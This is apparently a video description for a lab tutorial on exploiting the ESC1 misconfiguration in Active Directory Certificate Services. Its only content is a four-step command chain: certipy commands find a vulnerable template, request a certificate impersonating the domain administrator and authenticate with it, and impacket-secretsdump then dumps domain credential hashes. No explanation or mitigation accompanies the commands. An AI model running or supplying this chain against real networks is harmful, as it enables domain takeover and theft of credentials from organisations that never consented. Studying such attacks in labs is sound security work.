Exploiting Vulnerable Active Directory Certificate Template: ESC1

Опубликовано: 06 Сентябрь 2023
на канале: Thatquietkid
2,777
55

The commands used:
1) certipy find -vulnerable -dc-ip 192.168.1.24 -u [email protected] -p 'P@ssw0rd!'
2) certipy req -dc-ip 192.168.1.24 -u [email protected] -p 'P@ssw0rd!' -ca ACU-ANIKATE-DC-CA -template ESC1 -upn [email protected] -dns Anikate-DC.ACU.local
3) certipy auth -pfx administrator_anikate-dc.pfx -dc-ip 192.168.1.24
4) impacket-secretsdump -hashes '(hash)' 'ACU.local/[email protected].'